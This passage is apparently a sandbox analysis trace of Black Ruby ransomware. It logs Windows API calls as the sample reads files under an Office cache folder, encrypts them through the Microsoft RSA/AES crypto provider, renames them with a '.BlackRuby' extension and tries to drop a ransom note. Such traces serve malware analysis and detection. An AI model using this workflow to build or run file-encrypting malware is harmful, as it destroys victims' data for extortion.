ftLastAccessTime.dwLowDateTime=0xbc5f4d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3ecc4e20, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x17fb400)) returned 1 [0047.453] GetLastError () returned 0x5 [0047.453] SetErrorMode (uMode=0x0) returned 0x1 [0047.453] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.453] GetLastError () returned 0x5 [0047.453] SetErrorMode (uMode=0x1) returned 0x0 [0047.453] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.453] GetLastError () returned 0x5 [0047.454] SetErrorMode (uMode=0x0) returned 0x1 [0047.454] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0047.454] GetLastError () returned 0x5 [0047.454] SetErrorMode (uMode=0x1) returned 0x0 [0047.454] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\proplusrww.xml"), fInfoLevelId=0x0, lpFileInformation=0x1cc3450 | out: lpFileInformation=0x1cc3450*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3ecc4e20, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x4366)) returned 1 [0047.454] GetLastError () returned 0x5 [0047.454] SetErrorMode (uMode=0x0) returned 0x1 [0047.454] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0047.454] GetLastError () returned 0x5 [0047.454] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0047.454] GetLastError () returned 0x5 [0047.454] SetErrorMode (uMode=0x1) returned 0x0 [0047.454] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.454] GetLastError () returned 0x0 [0047.454] GetFileType (hFile=0x184) returned 0x1 [0047.454] SetErrorMode (uMode=0x0) returned 0x1 [0047.454] GetFileType (hFile=0x184) returned 0x1 [0047.454] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x4366 [0047.455] GetLastError () returned 0x0 [0047.455] ReadFile (in: hFile=0x184, lpBuffer=0x1cc53f4, nNumberOfBytesToRead=0x4366, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cc53f4*, lpNumberOfBytesRead=0x18ed84*=0x4366, lpOverlapped=0x0) returned 1 [0047.466] GetLastError () returned 0x0 [0047.466] CloseHandle (hObject=0x184) returned 1 [0047.466] GetLastError () returned 0x0 [0047.466] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0047.466] GetLastError () returned 0x0 [0047.466] SetErrorMode (uMode=0x1) returned 0x0 [0047.466] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\proplusrww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3ecc4e20, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x4366)) returned 1 [0047.466] GetLastError () returned 0x0 [0047.466] SetErrorMode (uMode=0x0) returned 0x1 [0047.467] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0047.467] GetLastError () returned 0x0 [0047.506] CryptImportKey (in: hProv=0x37c680, pbData=0x1b2dc58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ee0) returned 1 [0047.506] GetLastError () returned 0x0 [0047.506] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.506] GetLastError () returned 0x0 [0047.511] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.511] GetLastError () returned 0x0 [0047.511] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0047.511] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.511] GetLastError () returned 0x0 [0047.511] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1b5aca4*=0x1, dwFlags=0x0) returned 1 [0047.511] GetLastError () returned 0x0 [0047.511] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1b5ac70, dwFlags=0x0) returned 1 [0047.511] GetLastError () returned 0x0 [0047.511] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b5acec*, pdwDataLen=0x18ed74*=0x4460, dwBufLen=0x4460 | out: pbData=0x1b5acec*, pdwDataLen=0x18ed74*=0x4460) returned 1 [0047.511] GetLastError () returned 0x0 [0047.511] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b635d8*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b635d8*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.511] GetLastError () returned 0x0 [0047.511] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b63608*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b63608*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.511] GetLastError () returned 0x0 [0047.511] CryptDestroyKey (hKey=0x360ee0) returned 1 [0047.511] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.511] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.511] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0047.511] GetLastError () returned 0x0 [0047.511] SetErrorMode (uMode=0x1) returned 0x0 [0047.511] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.512] GetLastError () returned 0xb7 [0047.512] GetFileType (hFile=0x184) returned 0x1 [0047.512] SetErrorMode (uMode=0x0) returned 0x1 [0047.512] GetFileType (hFile=0x184) returned 0x1 [0047.513] CloseHandle (hObject=0x184) returned 1 [0047.514] GetLastError () returned 0xb7 [0047.514] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0047.514] GetLastError () returned 0xb7 [0047.514] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Encrypted_U5E8VUSYOgunZFrkbhfzjmVaRrLyE8SxYl7DJiEDv6j7f.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Encrypted_U5E8VUSYOgunZFrkbhfzjmVaRrLyE8SxYl7DJiEDv6j7f.BlackRuby", lpFilePart=0x0) returned 0x80 [0047.514] GetLastError () returned 0xb7 [0047.514] SetErrorMode (uMode=0x1) returned 0x0 [0047.514] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\proplusrww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2485cda0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4470)) returned 1 [0047.514] GetLastError () returned 0xb7 [0047.514] SetErrorMode (uMode=0x0) returned 0x1 [0047.514] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Encrypted_U5E8VUSYOgunZFrkbhfzjmVaRrLyE8SxYl7DJiEDv6j7f.BlackRuby" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\encrypted_u5e8vusyogunzfrkbhfzjmvarrlye8sxyl7djiedv6j7f.blackruby")) returned 1 [0047.514] GetLastError () returned 0xb7 [0047.514] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.514] GetLastError () returned 0xb7 [0047.514] SetErrorMode (uMode=0x1) returned 0x0 [0047.515] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.515] GetLastError () returned 0x5 [0047.515] SetErrorMode (uMode=0x0) returned 0x1 [0047.516] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPrWW.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPrWW.cab", lpFilePart=0x0) returned 0x4a [0047.516] GetLastError () returned 0x5 [0047.516] SetErrorMode (uMode=0x1) returned 0x0 [0047.516] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\proprww.cab"), fInfoLevelId=0x0, lpFileInformation=0x1b8d884 | out: lpFileInformation=0x1b8d884*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3edf60f0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x8e5d07b)) returned 1 [0047.516] GetLastError () returned 0x5 [0047.516] SetErrorMode (uMode=0x0) returned 0x1 [0047.517] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.517] GetLastError () returned 0x5 [0047.517] SetErrorMode (uMode=0x1) returned 0x0 [0047.517] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.517] GetLastError () returned 0x5 [0047.518] SetErrorMode (uMode=0x0) returned 0x1 [0047.518] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPrWW2.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPrWW2.cab", lpFilePart=0x0) returned 0x4b [0047.518] GetLastError () returned 0x5 [0047.518] SetErrorMode (uMode=0x1) returned 0x0 [0047.518] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\proprww2.cab"), fInfoLevelId=0x0, lpFileInformation=0x1bab860 | out: lpFileInformation=0x1bab860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1a3f6500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x1a3f6500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x41587740, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xbcc3c23)) returned 1 [0047.518] GetLastError () returned 0x5 [0047.518] SetErrorMode (uMode=0x0) returned 0x1 [0047.518] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.518] GetLastError () returned 0x5 [0047.518] SetErrorMode (uMode=0x1) returned 0x0 [0047.518] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.518] GetLastError () returned 0x5 [0047.519] SetErrorMode (uMode=0x0) returned 0x1 [0047.519] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe", lpFilePart=0x0) returned 0x48 [0047.519] GetLastError () returned 0x5 [0047.519] SetErrorMode (uMode=0x1) returned 0x0 [0047.519] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\setup.exe"), fInfoLevelId=0x0, lpFileInformation=0x1bc9844 | out: lpFileInformation=0x1bc9844*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb406a700, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xb406a700, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x434ec900, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x10cb78)) returned 1 [0047.520] GetLastError () returned 0x5 [0047.520] SetErrorMode (uMode=0x0) returned 0x1 [0047.520] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.520] GetLastError () returned 0x5 [0047.520] SetErrorMode (uMode=0x1) returned 0x0 [0047.520] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.520] GetLastError () returned 0x5 [0047.521] SetErrorMode (uMode=0x0) returned 0x1 [0047.521] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.521] GetLastError () returned 0x5 [0047.521] SetErrorMode (uMode=0x1) returned 0x0 [0047.521] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1be7814 | out: lpFileInformation=0x1be7814*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x43f0ae50, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x7ddb)) returned 1 [0047.521] GetLastError () returned 0x5 [0047.521] SetErrorMode (uMode=0x0) returned 0x1 [0047.522] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.522] GetLastError () returned 0x5 [0047.522] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.522] GetLastError () returned 0x5 [0047.522] SetErrorMode (uMode=0x1) returned 0x0 [0047.522] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.522] GetLastError () returned 0x0 [0047.522] GetFileType (hFile=0x184) returned 0x1 [0047.522] SetErrorMode (uMode=0x0) returned 0x1 [0047.522] GetFileType (hFile=0x184) returned 0x1 [0047.522] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x7ddb [0047.522] GetLastError () returned 0x0 [0047.522] ReadFile (in: hFile=0x184, lpBuffer=0x1be9794, nNumberOfBytesToRead=0x7ddb, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1be9794*, lpNumberOfBytesRead=0x18ed84*=0x7ddb, lpOverlapped=0x0) returned 1 [0047.524] GetLastError () returned 0x0 [0047.524] CloseHandle (hObject=0x184) returned 1 [0047.524] GetLastError () returned 0x0 [0047.524] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.524] GetLastError () returned 0x0 [0047.524] SetErrorMode (uMode=0x1) returned 0x0 [0047.524] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x43f0ae50, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x7ddb)) returned 1 [0047.524] GetLastError () returned 0x0 [0047.524] SetErrorMode (uMode=0x0) returned 0x1 [0047.524] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0047.524] GetLastError () returned 0x0 [0047.545] CryptImportKey (in: hProv=0x37c708, pbData=0x1c53724, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ce0) returned 1 [0047.545] GetLastError () returned 0x0 [0047.545] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.545] GetLastError () returned 0x0 [0047.550] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.550] GetLastError () returned 0x0 [0047.550] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360a20) returned 1 [0047.550] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.550] GetLastError () returned 0x0 [0047.550] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1c80770*=0x1, dwFlags=0x0) returned 1 [0047.550] GetLastError () returned 0x0 [0047.550] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1c8073c, dwFlags=0x0) returned 1 [0047.550] GetLastError () returned 0x0 [0047.551] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c807b8*, pdwDataLen=0x18ed74*=0x7ed0, dwBufLen=0x7ed0 | out: pbData=0x1c807b8*, pdwDataLen=0x18ed74*=0x7ed0) returned 1 [0047.551] GetLastError () returned 0x0 [0047.551] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c90584*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c90584*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.551] GetLastError () returned 0x0 [0047.551] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c905b4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c905b4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.551] GetLastError () returned 0x0 [0047.551] CryptDestroyKey (hKey=0x360ce0) returned 1 [0047.551] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.551] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.551] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.551] GetLastError () returned 0x0 [0047.551] SetErrorMode (uMode=0x1) returned 0x0 [0047.551] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.552] GetLastError () returned 0xb7 [0047.552] GetFileType (hFile=0x184) returned 0x1 [0047.552] SetErrorMode (uMode=0x0) returned 0x1 [0047.552] GetFileType (hFile=0x184) returned 